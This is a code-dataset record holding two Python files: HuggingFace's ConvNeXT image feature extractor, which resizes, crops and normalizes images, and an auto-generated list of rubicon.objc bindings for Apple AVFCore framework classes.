] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 7,348 | py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Feature extractor class for ConvNeXT."""
from typing import Optional, Union
import numpy as np
from PIL import Image
from ...feature_extraction_utils import BatchFeature, FeatureExtractionMixin
from ...file_utils import TensorType
from ...image_utils import (
IMAGENET_DEFAULT_MEAN,
IMAGENET_DEFAULT_STD,
ImageFeatureExtractionMixin,
ImageInput,
is_torch_tensor,
)
from ...utils import logging
logger = logging.get_logger(__name__)
class ConvNextFeatureExtractor(FeatureExtractionMixin, ImageFeatureExtractionMixin):
r"""
Constructs a ConvNeXT feature extractor.
This feature extractor inherits from [`FeatureExtractionMixin`] which contains most of the main methods. Users
should refer to this superclass for more information regarding those methods.
Args:
do_resize (`bool`, *optional*, defaults to `True`):
Whether to resize (and optionally center crop) the input to a certain `size`.
size (`int`, *optional*, defaults to 224):
Resize the input to the given size. If 384 or larger, the image is resized to (`size`, `size`). Else, the
smaller edge of the image will be matched to int(`size`/ `crop_pct`), after which the image is cropped to
`size`. Only has an effect if `do_resize` is set to `True`.
resample (`int`, *optional*, defaults to `PIL.Image.BICUBIC`):
An optional resampling filter. This can be one of `PIL.Image.NEAREST`, `PIL.Image.BOX`,
`PIL.Image.BILINEAR`, `PIL.Image.HAMMING`, `PIL.Image.BICUBIC` or `PIL.Image.LANCZOS`. Only has an effect
if `do_resize` is set to `True`.
crop_pct (`float`, *optional*):
The percentage of the image to crop. If `None`, then a cropping percentage of 224 / 256 is used. Only has
an effect if `do_resize` is set to `True` and `size` < 384.
do_normalize (`bool`, *optional*, defaults to `True`):
Whether or not to normalize the input with mean and standard deviation.
image_mean (`List[int]`, defaults to `[0.485, 0.456, 0.406]`):
The sequence of means for each channel, to be used when normalizing images.
image_std (`List[int]`, defaults to `[0.229, 0.224, 0.225]`):
The sequence of standard deviations for each channel, to be used when normalizing images.
"""
model_input_names = ["pixel_values"]
def __init__(
self,
do_resize=True,
size=224,
resample=Image.BICUBIC,
crop_pct=None,
do_normalize=True,
image_mean=None,
image_std=None,
**kwargs
):
super().__init__(**kwargs)
self.do_resize = do_resize
self.size = size
self.resample = resample
self.crop_pct = crop_pct
self.do_normalize = do_normalize
self.image_mean = image_mean if image_mean is not None else IMAGENET_DEFAULT_MEAN
self.image_std = image_std if image_std is not None else IMAGENET_DEFAULT_STD
def __call__(
self, images: ImageInput, return_tensors: Optional[Union[str, TensorType]] = None, **kwargs
) -> BatchFeature:
"""
Main method to prepare for the model one or several image(s).
<Tip warning={true}>
NumPy arrays and PyTorch tensors are converted to PIL images when resizing, so the most efficient is to pass
PIL images.
</Tip>
Args:
images (`PIL.Image.Image`, `np.ndarray`, `torch.Tensor`, `List[PIL.Image.Image]`, `List[np.ndarray]`, `List[torch.Tensor]`):
The image or batch of images to be prepared. Each image can be a PIL image, NumPy array or PyTorch
tensor. In case of a NumPy array/PyTorch tensor, each image should be of shape (C, H, W), where C is a
number of channels, H and W are image height and width.
return_tensors (`str` or [`~file_utils.TensorType`], *optional*, defaults to `'np'`):
If set, will return tensors of a particular framework. Acceptable values are:
- `'tf'`: Return TensorFlow `tf.constant` objects.
- `'pt'`: Return PyTorch `torch.Tensor` objects.
- `'np'`: Return NumPy `np.ndarray` objects.
- `'jax'`: Return JAX `jnp.ndarray` objects.
Returns:
[`BatchFeature`]: A [`BatchFeature`] with the following fields:
- **pixel_values** -- Pixel values to be fed to a model, of shape (batch_size, num_channels, height,
width).
"""
# Input type checking for clearer error
valid_images = False
# Check that images has a valid type
if isinstance(images, (Image.Image, np.ndarray)) or is_torch_tensor(images):
valid_images = True
elif isinstance(images, (list, tuple)):
if len(images) == 0 or isinstance(images[0], (Image.Image, np.ndarray)) or is_torch_tensor(images[0]):
valid_images = True
if not valid_images:
raise ValueError(
"Images must of type `PIL.Image.Image`, `np.ndarray` or `torch.Tensor` (single example), "
"`List[PIL.Image.Image]`, `List[np.ndarray]` or `List[torch.Tensor]` (batch of examples)."
)
is_batched = bool(
isinstance(images, (list, tuple))
and (isinstance(images[0], (Image.Image, np.ndarray)) or is_torch_tensor(images[0]))
)
if not is_batched:
images = [images]
# transformations (resizing and optional center cropping + normalization)
if self.do_resize and self.size is not None:
if self.size >= 384:
# warping (no cropping) when evaluated at 384 or larger
images = [self.resize(image=image, size=self.size, resample=self.resample) for image in images]
else:
if self.crop_pct is None:
self.crop_pct = 224 / 256
size = int(self.size / self.crop_pct)
# to maintain same ratio w.r.t. 224 images
images = [
self.resize(image=image, size=size, default_to_square=False, resample=self.resample)
for image in images
]
images = [self.center_crop(image=image, size=self.size) for image in images]
if self.do_normalize:
images = [self.normalize(image=image, mean=self.image_mean, std=self.image_std) for image in images]
# return as BatchFeature
data = {"pixel_values": images}
encoded_inputs = BatchFeature(data=data, tensor_type=return_tensors)
return encoded_inputs
| [
"[email protected]"
] | |
16b93229b03936799fb366deb70beeb32959ddde | 16caebb320bb10499d3712bf0bdc07539a4d0007 | /objc/_AVFCore.py | 8eff0d83bfa6c2ce26f78a9b763e51d9f784ce49 | [] | no_license | swosnick/Apple-Frameworks-Python | 876d30f308a7ac1471b98a9da2fabd22f30c0fa5 | 751510137e9fa35cc806543db4e4415861d4f252 | refs/heads/master | 2022-12-08T07:08:40.154553 | 2020-09-04T17:36:24 | 2020-09-04T17:36:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,715 | py | '''
Classes from the 'AVFCore' framework.
'''
try:
from rubicon.objc import ObjCClass
except ValueError:
def ObjCClass(name):
return None
def _Class(name):
try:
return ObjCClass(name)
except NameError:
return None
AVStreamDataParser = _Class('AVStreamDataParser')
AVStreamDataParserInternal = _Class('AVStreamDataParserInternal')
AVRouteDetector = _Class('AVRouteDetector')
AVRouteDetectorInternal = _Class('AVRouteDetectorInternal')
AVFigEndpointUIAgentOutputDeviceAuthorizationRequestImpl = _Class('AVFigEndpointUIAgentOutputDeviceAuthorizationRequestImpl')
AVFigEndpointUIAgentOutputDeviceAuthorizationSessionImpl = _Class('AVFigEndpointUIAgentOutputDeviceAuthorizationSessionImpl')
AVContentKeyReportGroup = _Class('AVContentKeyReportGroup')
AVContentKeySession = _Class('AVContentKeySession')
AVContentKeySessionInternal = _Class('AVContentKeySessionInternal')
AVContentKeyResponseInternal = _Class('AVContentKeyResponseInternal')
AVContentKeyResponse = _Class('AVContentKeyResponse')
AVContentKeyResponseAuthorizationToken = _Class('AVContentKeyResponseAuthorizationToken')
AVContentKeyResponseClearKey = _Class('AVContentKeyResponseClearKey')
AVContentKeyResponseFairPlayStreaming = _Class('AVContentKeyResponseFairPlayStreaming')
AVContentKeyRequest = _Class('AVContentKeyRequest')
AVPersistableContentKeyRequest = _Class('AVPersistableContentKeyRequest')
AVContentKeyRequestInternal = _Class('AVContentKeyRequestInternal')
AVHUDStringGenerator = _Class('AVHUDStringGenerator')
AVMutableMovieInternal = _Class('AVMutableMovieInternal')
AVMovieInternal = _Class('AVMovieInternal')
AVMediaDataStorage = _Class('AVMediaDataStorage')
AVMediaDataStorageInternal = _Class('AVMediaDataStorageInternal')
AVFigEndpointUIAgentOutputContextManagerImpl = _Class('AVFigEndpointUIAgentOutputContextManagerImpl')
AVFigCommChannelUUIDOutputContextCommunicationChannelImpl = _Class('AVFigCommChannelUUIDOutputContextCommunicationChannelImpl')
AVFigRouteDescriptorFigRoutingContextOutputDeviceTranslator = _Class('AVFigRouteDescriptorFigRoutingContextOutputDeviceTranslator')
AVFigEndpointFigRoutingContextOutputDeviceTranslator = _Class('AVFigEndpointFigRoutingContextOutputDeviceTranslator')
AVFigCommChannelUUIDCommunicationChannelManager = _Class('AVFigCommChannelUUIDCommunicationChannelManager')
AVFigRoutingContextOutputContextImpl = _Class('AVFigRoutingContextOutputContextImpl')
AVVideoCompositionRenderContext = _Class('AVVideoCompositionRenderContext')
AVVideoCompositionRenderContextInternal = _Class('AVVideoCompositionRenderContextInternal')
AVKeyPathFlattenerKVOIntrospectionShim = _Class('AVKeyPathFlattenerKVOIntrospectionShim')
AVKeyPathFlattener = _Class('AVKeyPathFlattener')
AVTwoPartKeyPath = _Class('AVTwoPartKeyPath')
AVKeyPathDependency = _Class('AVKeyPathDependency')
AVKeyPathDependencyManager = _Class('AVKeyPathDependencyManager')
AVWeakObservableCallbackCancellationHelper = _Class('AVWeakObservableCallbackCancellationHelper')
AVWeaklyObservedObjectClientBlockKVONotifier = _Class('AVWeaklyObservedObjectClientBlockKVONotifier')
AVClientBlockKVONotifier = _Class('AVClientBlockKVONotifier')
AVWeakObservationBlockFactory = _Class('AVWeakObservationBlockFactory')
AVObservationBlockFactory = _Class('AVObservationBlockFactory')
AVKVODispatcher = _Class('AVKVODispatcher')
AVAsynchronousVideoCompositionRequest = _Class('AVAsynchronousVideoCompositionRequest')
AVAsynchronousVideoCompositionRequestInternal = _Class('AVAsynchronousVideoCompositionRequestInternal')
AVFigEndpointOutputDeviceDiscoverySessionAvailableOutputDevicesImpl = _Class('AVFigEndpointOutputDeviceDiscoverySessionAvailableOutputDevicesImpl')
AVCustomVideoCompositorSession = _Class('AVCustomVideoCompositorSession')
AVExternalDevice = _Class('AVExternalDevice')
AVExternalDeviceTurnByTurnToken = _Class('AVExternalDeviceTurnByTurnToken')
AVExternalDeviceScreenBorrowToken = _Class('AVExternalDeviceScreenBorrowToken')
AVExternalDeviceInternal = _Class('AVExternalDeviceInternal')
AVExternalDeviceIcon = _Class('AVExternalDeviceIcon')
AVExternalDeviceIconInternal = _Class('AVExternalDeviceIconInternal')
AVExternalDeviceHID = _Class('AVExternalDeviceHID')
AVExternalDeviceHIDInternal = _Class('AVExternalDeviceHIDInternal')
AVMediaSelection = _Class('AVMediaSelection')
AVMutableMediaSelection = _Class('AVMutableMediaSelection')
AVMediaSelectionInternal = _Class('AVMediaSelectionInternal')
AVIOKitOutputSettingsAssistantVideoEncoderCapabilities = _Class('AVIOKitOutputSettingsAssistantVideoEncoderCapabilities')
AVExportSettingsOutputSettingsAssistantVideoSettingsAdjuster = _Class('AVExportSettingsOutputSettingsAssistantVideoSettingsAdjuster')
AVExportSettingsOutputSettingsAssistantBaseSettings = _Class('AVExportSettingsOutputSettingsAssistantBaseSettings')
AVOutputSettingsAssistant = _Class('AVOutputSettingsAssistant')
AVOutputSettingsAssistantInternal = _Class('AVOutputSettingsAssistantInternal')
AVCoreImageFilterCustomVideoCompositor = _Class('AVCoreImageFilterCustomVideoCompositor')
AVCoreImageFilterVideoCompositionInstruction = _Class('AVCoreImageFilterVideoCompositionInstruction')
AVAsynchronousCIImageFilteringRequest = _Class('AVAsynchronousCIImageFilteringRequest')
AVAsynchronousCIImageFilteringRequestInternal = _Class('AVAsynchronousCIImageFilteringRequestInternal')
AVFigRouteDescriptorOutputDeviceDiscoverySessionAvailableOutputDevicesImpl = _Class('AVFigRouteDescriptorOutputDeviceDiscoverySessionAvailableOutputDevicesImpl')
AVFigRouteDiscovererOutputDeviceDiscoverySessionImpl = _Class('AVFigRouteDiscovererOutputDeviceDiscoverySessionImpl')
AVFigRouteDiscovererOutputDeviceDiscoverySessionFactory = _Class('AVFigRouteDiscovererOutputDeviceDiscoverySessionFactory')
AVPlayerItemLegibleOutputInternal = _Class('AVPlayerItemLegibleOutputInternal')
AVPlayerItemLegibleOutputRealDependencyFactory = _Class('AVPlayerItemLegibleOutputRealDependencyFactory')
AVPlayerMediaSelectionCriteria = _Class('AVPlayerMediaSelectionCriteria')
AVTextStyleRule = _Class('AVTextStyleRule')
AVTextStyleRuleInternal = _Class('AVTextStyleRuleInternal')
AVRemoteFigSampleBufferRenderSynchronizerFactory = _Class('AVRemoteFigSampleBufferRenderSynchronizerFactory')
AVSampleBufferRenderSynchronizer = _Class('AVSampleBufferRenderSynchronizer')
AVSampleBufferRenderSynchronizerInternal = _Class('AVSampleBufferRenderSynchronizerInternal')
AVAssetResourceLoadingRequestor = _Class('AVAssetResourceLoadingRequestor')
AVAssetResourceLoadingRequestorInternal = _Class('AVAssetResourceLoadingRequestorInternal')
AVAssetResourceLoadingRequest = _Class('AVAssetResourceLoadingRequest')
AVAssetResourceRenewalRequest = _Class('AVAssetResourceRenewalRequest')
AVAssetResourceLoadingRequestInternal = _Class('AVAssetResourceLoadingRequestInternal')
AVAssetResourceLoadingDataRequest = _Class('AVAssetResourceLoadingDataRequest')
AVAssetResourceLoadingDataRequestInternal = _Class('AVAssetResourceLoadingDataRequestInternal')
AVAssetResourceLoadingContentInformationRequest = _Class('AVAssetResourceLoadingContentInformationRequest')
AVAssetResourceLoadingContentInformationRequestInternal = _Class('AVAssetResourceLoadingContentInformationRequestInternal')
AVAssetResourceLoader = _Class('AVAssetResourceLoader')
AVAssetResourceLoaderInternal = _Class('AVAssetResourceLoaderInternal')
AVAssetResourceLoaderRemoteHandlerContext = _Class('AVAssetResourceLoaderRemoteHandlerContext')
AVPixelBufferAttributeMediator = _Class('AVPixelBufferAttributeMediator')
AVSampleBufferDisplayLayerInternal = _Class('AVSampleBufferDisplayLayerInternal')
AVAPSyncControllerOutputDeviceImpl = _Class('AVAPSyncControllerOutputDeviceImpl')
AVPlayerItemVideoOutputInternal = _Class('AVPlayerItemVideoOutputInternal')
AVPlayerItemOutputInternal = _Class('AVPlayerItemOutputInternal')
AVAssetDownloadSession = _Class('AVAssetDownloadSession')
AVAssetDownloadSessionInternal = _Class('AVAssetDownloadSessionInternal')
AVFloat64Range = _Class('AVFloat64Range')
AVAudioSettingsValueConstrainer = _Class('AVAudioSettingsValueConstrainer')
AVAssetSegmentReport = _Class('AVAssetSegmentReport')
AVAssetSegmentTrackReport = _Class('AVAssetSegmentTrackReport')
AVAssetSegmentReportSampleInformation = _Class('AVAssetSegmentReportSampleInformation')
AVMediaFileOutputSettingsValidator = _Class('AVMediaFileOutputSettingsValidator')
AVGenericMediaFileOutputSettingsValidator = _Class('AVGenericMediaFileOutputSettingsValidator')
AVISOOutputSettingsValidator = _Class('AVISOOutputSettingsValidator')
AVAIFCOutputSettingsValidator = _Class('AVAIFCOutputSettingsValidator')
AVAIFFOutputSettingsValidator = _Class('AVAIFFOutputSettingsValidator')
AVWAVEOutputSettingsValidator = _Class('AVWAVEOutputSettingsValidator')
AVMediaFileType = _Class('AVMediaFileType')
AVDisplayCriteria = _Class('AVDisplayCriteria')
AVDisplayCriteriaInternal = _Class('AVDisplayCriteriaInternal')
AVFormatSpecification = _Class('AVFormatSpecification')
AVOutputSettings = _Class('AVOutputSettings')
AVVideoOutputSettings = _Class('AVVideoOutputSettings')
AVAVVideoSettingsVideoOutputSettings = _Class('AVAVVideoSettingsVideoOutputSettings')
AVPixelBufferAttributesVideoOutputSettings = _Class('AVPixelBufferAttributesVideoOutputSettings')
AVAudioOutputSettings = _Class('AVAudioOutputSettings')
AVAVAudioSettingsAudioOutputSettings = _Class('AVAVAudioSettingsAudioOutputSettings')
AVMediaSelectionOptionInternal = _Class('AVMediaSelectionOptionInternal')
AVMediaSelectionGroupInternal = _Class('AVMediaSelectionGroupInternal')
AVAudioSessionMediaPlayerOnly = _Class('AVAudioSessionMediaPlayerOnly')
AVAudioSessionMediaPlayerOnlyInternal = _Class('AVAudioSessionMediaPlayerOnlyInternal')
AVPlayerItemErrorLogEvent = _Class('AVPlayerItemErrorLogEvent')
AVPlayerItemErrorLogEventInternal = _Class('AVPlayerItemErrorLogEventInternal')
AVPlayerItemErrorLog = _Class('AVPlayerItemErrorLog')
AVPlayerItemErrorLogInternal = _Class('AVPlayerItemErrorLogInternal')
AVPlayerItemAccessLogEvent = _Class('AVPlayerItemAccessLogEvent')
AVPlayerItemAccessLogEventInternal = _Class('AVPlayerItemAccessLogEventInternal')
AVPlayerItemAccessLog = _Class('AVPlayerItemAccessLog')
AVPlayerItemAccessLogInternal = _Class('AVPlayerItemAccessLogInternal')
AVAssetDownloadCacheInternal = _Class('AVAssetDownloadCacheInternal')
AVManagedAssetCacheInternal = _Class('AVManagedAssetCacheInternal')
AVAssetCache = _Class('AVAssetCache')
AVAssetDownloadCache = _Class('AVAssetDownloadCache')
AVManagedAssetCache = _Class('AVManagedAssetCache')
AVDateRangeMetadataGroupInternal = _Class('AVDateRangeMetadataGroupInternal')
AVTimedMetadataGroupInternal = _Class('AVTimedMetadataGroupInternal')
AVMetadataGroup = _Class('AVMetadataGroup')
AVDateRangeMetadataGroup = _Class('AVDateRangeMetadataGroup')
AVMutableDateRangeMetadataGroup = _Class('AVMutableDateRangeMetadataGroup')
AVTimedMetadataGroup = _Class('AVTimedMetadataGroup')
AVMutableTimedMetadataGroup = _Class('AVMutableTimedMetadataGroup')
AVDispatchOnce = _Class('AVDispatchOnce')
AVEventWaiter = _Class('AVEventWaiter')
AVAPSyncOutputDeviceCommunicationChannelImpl = _Class('AVAPSyncOutputDeviceCommunicationChannelImpl')
AVAPSyncOutputDeviceCommunicationChannelManager = _Class('AVAPSyncOutputDeviceCommunicationChannelManager')
AVAssetTrackGroup = _Class('AVAssetTrackGroup')
AVAssetTrackGroupInternal = _Class('AVAssetTrackGroupInternal')
AVPlayerItemMediaDataCollectorInternal = _Class('AVPlayerItemMediaDataCollectorInternal')
AVCMNotificationDispatcherListenerKey = _Class('AVCMNotificationDispatcherListenerKey')
AVCMNotificationDispatcher = _Class('AVCMNotificationDispatcher')
AVAPSyncControllerRemoteOutputDeviceGroupImpl = _Class('AVAPSyncControllerRemoteOutputDeviceGroupImpl')
AVCallbackContextRegistry = _Class('AVCallbackContextRegistry')
AVFigRoutingContextCommandOutputDeviceConfiguration = _Class('AVFigRoutingContextCommandOutputDeviceConfiguration')
AVFigRoutingContextCommandOutputDeviceConfigurationModification = _Class('AVFigRoutingContextCommandOutputDeviceConfigurationModification')
AVWeakReference = _Class('AVWeakReference')
AVRetainReleaseWeakReference = _Class('AVRetainReleaseWeakReference')
AVResult = _Class('AVResult')
AVAssetInspectorLoader = _Class('AVAssetInspectorLoader')
AVUnreachableAssetInspectorLoader = _Class('AVUnreachableAssetInspectorLoader')
AVFigAssetInspectorLoader = _Class('AVFigAssetInspectorLoader')
AVAssetMakeReadyForInspectionLoader = _Class('AVAssetMakeReadyForInspectionLoader')
AVPlaybackItemInspectorLoader = _Class('AVPlaybackItemInspectorLoader')
AVAssetSynchronousInspectorLoader = _Class('AVAssetSynchronousInspectorLoader')
AVDepartureAnnouncingObjectMonitor = _Class('AVDepartureAnnouncingObjectMonitor')
AVGlobalOperationQueue = _Class('AVGlobalOperationQueue')
AVWeakReferencingDelegateStorage = _Class('AVWeakReferencingDelegateStorage')
AVScheduledAudioParameters = _Class('AVScheduledAudioParameters')
AVMutableScheduledAudioParameters = _Class('AVMutableScheduledAudioParameters')
AVScheduledAudioParametersInternal = _Class('AVScheduledAudioParametersInternal')
AVVideoPerformanceMetrics = _Class('AVVideoPerformanceMetrics')
AVVideoPerformanceMetricsInternal = _Class('AVVideoPerformanceMetricsInternal')
AVMutableMovieTrackInternal = _Class('AVMutableMovieTrackInternal')
AVMovieTrackInternal = _Class('AVMovieTrackInternal')
AVSystemRemotePoolOutputDeviceCommunicationChannelImpl = _Class('AVSystemRemotePoolOutputDeviceCommunicationChannelImpl')
AVSystemRemotePoolOutputDeviceCommunicationChannelManager = _Class('AVSystemRemotePoolOutputDeviceCommunicationChannelManager')
AVOutputContextManager = _Class('AVOutputContextManager')
AVOutputContextManagerInternal = _Class('AVOutputContextManagerInternal')
AVOutputContextDestinationChange = _Class('AVOutputContextDestinationChange')
AVOutputContextDestinationChangeInternal = _Class('AVOutputContextDestinationChangeInternal')
AVOutputContextCommunicationChannel = _Class('AVOutputContextCommunicationChannel')
AVOutputContextCommunicationChannelInternal = _Class('AVOutputContextCommunicationChannelInternal')
AVOutputContext = _Class('AVOutputContext')
AVOutputContextInternal = _Class('AVOutputContextInternal')
AVRunLoopConditionRunLoopState = _Class('AVRunLoopConditionRunLoopState')
AVAudioMixInputParametersInternal = _Class('AVAudioMixInputParametersInternal')
AVAudioMixInputParameters = _Class('AVAudioMixInputParameters')
AVMutableAudioMixInputParameters = _Class('AVMutableAudioMixInputParameters')
AVAudioMixInternal = _Class('AVAudioMixInternal')
AVAudioMix = _Class('AVAudioMix')
AVMutableAudioMix = _Class('AVMutableAudioMix')
AVAssetCustomURLAuthentication = _Class('AVAssetCustomURLAuthentication')
AVAssetCustomURLBridgeForNSURLProtocol = _Class('AVAssetCustomURLBridgeForNSURLProtocol')
AVAssetCustomURLBridgeForNSURLSession = _Class('AVAssetCustomURLBridgeForNSURLSession')
AVAssetCustomURLRequest = _Class('AVAssetCustomURLRequest')
AVNSURLProtocolRequest = _Class('AVNSURLProtocolRequest')
AVFigEndpointSecondDisplayModeToken = _Class('AVFigEndpointSecondDisplayModeToken')
AVFigEndpointOutputDeviceImpl = _Class('AVFigEndpointOutputDeviceImpl')
AVFigRouteDescriptorOutputDeviceImpl = _Class('AVFigRouteDescriptorOutputDeviceImpl')
AVClusterComponentOutputDeviceDescription = _Class('AVClusterComponentOutputDeviceDescription')
AVOutputDeviceCommunicationChannel = _Class('AVOutputDeviceCommunicationChannel')
AVLocalOutputDeviceImpl = _Class('AVLocalOutputDeviceImpl')
AVPairedDevice = _Class('AVPairedDevice')
AVPairedDeviceInternal = _Class('AVPairedDeviceInternal')
AVOutputDeviceAuthorizedPeer = _Class('AVOutputDeviceAuthorizedPeer')
AVOutputDeviceAuthorizedPeerInternal = _Class('AVOutputDeviceAuthorizedPeerInternal')
AVOutputDeviceLegacyFrecentsWriter = _Class('AVOutputDeviceLegacyFrecentsWriter')
AVOutputDeviceLegacyFrecentsReader = _Class('AVOutputDeviceLegacyFrecentsReader')
AVOutputDeviceFrecentsWriter = _Class('AVOutputDeviceFrecentsWriter')
AVOutputDeviceFrecentsReader = _Class('AVOutputDeviceFrecentsReader')
AVOutputDeviceFrecencyManager = _Class('AVOutputDeviceFrecencyManager')
AVOutputDevice = _Class('AVOutputDevice')
AVOutputDeviceInternal = _Class('AVOutputDeviceInternal')
AVMediaDataRequester = _Class('AVMediaDataRequester')
AVSerializedMostlySynchronousReentrantBlockScheduler = _Class('AVSerializedMostlySynchronousReentrantBlockScheduler')
AVSynchronousBlockScheduler = _Class('AVSynchronousBlockScheduler')
AVFragmentedMovieTrackInternal = _Class('AVFragmentedMovieTrackInternal')
AVExecutionEnvironment = _Class('AVExecutionEnvironment')
AVSampleBufferVideoOutput = _Class('AVSampleBufferVideoOutput')
AVSampleBufferVideoOutputInternal = _Class('AVSampleBufferVideoOutputInternal')
AVExternalPlaybackMonitor = _Class('AVExternalPlaybackMonitor')
AVExternalPlaybackMonitorInternal = _Class('AVExternalPlaybackMonitorInternal')
AVTimeFormatterInternal = _Class('AVTimeFormatterInternal')
AVOutputDeviceAuthorizationRequest = _Class('AVOutputDeviceAuthorizationRequest')
AVOutputDeviceAuthorizationRequestInternal = _Class('AVOutputDeviceAuthorizationRequestInternal')
AVOutputDeviceAuthorizationSession = _Class('AVOutputDeviceAuthorizationSession')
AVOutputDeviceAuthorizationSessionInternal = _Class('AVOutputDeviceAuthorizationSessionInternal')
AVVideoCompositionRenderHint = _Class('AVVideoCompositionRenderHint')
AVVideoCompositionRenderHintInternal = _Class('AVVideoCompositionRenderHintInternal')
AVPlayerItemOutput = _Class('AVPlayerItemOutput')
AVPlayerItemLegibleOutput = _Class('AVPlayerItemLegibleOutput')
AVPlayerItemVideoOutput = _Class('AVPlayerItemVideoOutput')
AVPlayerItemMetadataOutput = _Class('AVPlayerItemMetadataOutput')
AVPlayerItemMetadataOutputInternal = _Class('AVPlayerItemMetadataOutputInternal')
AVOutputDeviceGroupMembershipChangeResult = _Class('AVOutputDeviceGroupMembershipChangeResult')
AVOutputDeviceGroup = _Class('AVOutputDeviceGroup')
AVExternalProtectionMonitor = _Class('AVExternalProtectionMonitor')
AVExternalProtectionMonitorInternal = _Class('AVExternalProtectionMonitorInternal')
AVFragmentedAssetTrackInternal = _Class('AVFragmentedAssetTrackInternal')
AVFragmentedAssetMinder = _Class('AVFragmentedAssetMinder')
AVFragmentedMovieMinder = _Class('AVFragmentedMovieMinder')
AVFragmentedAssetMinderInternal = _Class('AVFragmentedAssetMinderInternal')
AVFragmentedAssetInternal = _Class('AVFragmentedAssetInternal')
AVSampleBufferAudioRenderer = _Class('AVSampleBufferAudioRenderer')
AVSampleBufferAudioRendererInternal = _Class('AVSampleBufferAudioRendererInternal')
AVAssetWriterInputMetadataAdaptor = _Class('AVAssetWriterInputMetadataAdaptor')
AVAssetWriterInputMetadataAdaptorInternal = _Class('AVAssetWriterInputMetadataAdaptorInternal')
AVSynchronizedLayerInternal = _Class('AVSynchronizedLayerInternal')
AVAudioMixSweepFilterEffectParametersInternal = _Class('AVAudioMixSweepFilterEffectParametersInternal')
AVAudioMixEffectParameters = _Class('AVAudioMixEffectParameters')
AVAudioMixSweepFilterEffectParameters = _Class('AVAudioMixSweepFilterEffectParameters')
AVAssetExportSession = _Class('AVAssetExportSession')
AVAssetExportSessionInternal = _Class('AVAssetExportSessionInternal')
AVAssetProxyInternal = _Class('AVAssetProxyInternal')
AVVideoCompositionCoreAnimationToolInternal = _Class('AVVideoCompositionCoreAnimationToolInternal')
AVVideoCompositionCoreAnimationTool = _Class('AVVideoCompositionCoreAnimationTool')
AVVideoComposition = _Class('AVVideoComposition')
AVMutableVideoComposition = _Class('AVMutableVideoComposition')
AVVideoCompositionInternal = _Class('AVVideoCompositionInternal')
AVVideoCompositionLayerInstruction = _Class('AVVideoCompositionLayerInstruction')
AVMutableVideoCompositionLayerInstruction = _Class('AVMutableVideoCompositionLayerInstruction')
AVVideoCompositionLayerInstructionInternal = _Class('AVVideoCompositionLayerInstructionInternal')
AVVideoCompositionInstruction = _Class('AVVideoCompositionInstruction')
AVMutableVideoCompositionInstruction = _Class('AVMutableVideoCompositionInstruction')
AVVideoCompositionInstructionInternal = _Class('AVVideoCompositionInstructionInternal')
AVAssetWriterInputPassDescription = _Class('AVAssetWriterInputPassDescription')
AVAssetWriterInputPassDescriptionInternal = _Class('AVAssetWriterInputPassDescriptionInternal')
AVAssetWriterInputPassDescriptionResponder = _Class('AVAssetWriterInputPassDescriptionResponder')
AVAssetWriterInputMediaDataRequester = _Class('AVAssetWriterInputMediaDataRequester')
AVFigAssetWriterTrack = _Class('AVFigAssetWriterTrack')
AVFigAssetWriterGenericTrack = _Class('AVFigAssetWriterGenericTrack')
AVFigAssetWriterVideoTrack = _Class('AVFigAssetWriterVideoTrack')
AVFigAssetWriterAudioTrack = _Class('AVFigAssetWriterAudioTrack')
AVAssetWriterInputPixelBufferAdaptor = _Class('AVAssetWriterInputPixelBufferAdaptor')
AVAssetWriterInputPixelBufferAdaptorInternal = _Class('AVAssetWriterInputPixelBufferAdaptorInternal')
AVAssetWriterInputHelper = _Class('AVAssetWriterInputHelper')
AVAssetWriterInputTerminalHelper = _Class('AVAssetWriterInputTerminalHelper')
AVAssetWriterInputNoMorePassesHelper = _Class('AVAssetWriterInputNoMorePassesHelper')
AVAssetWriterInputInterPassAnalysisHelper = _Class('AVAssetWriterInputInterPassAnalysisHelper')
AVAssetWriterInputWritingHelper = _Class('AVAssetWriterInputWritingHelper')
AVAssetWriterInputUnknownHelper = _Class('AVAssetWriterInputUnknownHelper')
AVAssetWriterInput = _Class('AVAssetWriterInput')
AVAssetWriterInputInternal = _Class('AVAssetWriterInputInternal')
AVAssetWriterInputConfigurationState = _Class('AVAssetWriterInputConfigurationState')
AVRoutingSessionDestination = _Class('AVRoutingSessionDestination')
AVRoutingSessionDestinationInternal = _Class('AVRoutingSessionDestinationInternal')
AVRoutingSession = _Class('AVRoutingSession')
AVRoutingSessionInternal = _Class('AVRoutingSessionInternal')
AVRoutingSessionManager = _Class('AVRoutingSessionManager')
AVRoutingSessionManagerInternal = _Class('AVRoutingSessionManagerInternal')
AVPlayerItemMediaDataCollector = _Class('AVPlayerItemMediaDataCollector')
AVPlayerItemMetadataCollector = _Class('AVPlayerItemMetadataCollector')
AVPlayerItemMetadataCollectorInternal = _Class('AVPlayerItemMetadataCollectorInternal')
AVTimebaseObserver = _Class('AVTimebaseObserver')
AVOnceTimebaseObserver = _Class('AVOnceTimebaseObserver')
AVOccasionalTimebaseObserver = _Class('AVOccasionalTimebaseObserver')
AVPeriodicTimebaseObserver = _Class('AVPeriodicTimebaseObserver')
AVMediaSelectionOption = _Class('AVMediaSelectionOption')
AVMediaSelectionNilOption = _Class('AVMediaSelectionNilOption')
AVMediaSelectionKeyValueOption = _Class('AVMediaSelectionKeyValueOption')
AVMediaSelectionTrackOption = _Class('AVMediaSelectionTrackOption')
AVAssetWriterInputSelectionOption = _Class('AVAssetWriterInputSelectionOption')
AVMediaSelectionGroup = _Class('AVMediaSelectionGroup')
AVAssetMediaSelectionGroup = _Class('AVAssetMediaSelectionGroup')
AVAssetWriterInputGroup = _Class('AVAssetWriterInputGroup')
AVAssetWriterInputGroupInternal = _Class('AVAssetWriterInputGroupInternal')
